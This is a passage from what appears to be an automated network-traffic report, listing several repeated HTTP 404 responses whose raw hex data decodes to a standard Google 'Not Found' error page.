6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:46 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Wed, 05 Mar 2025 08:59:47 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
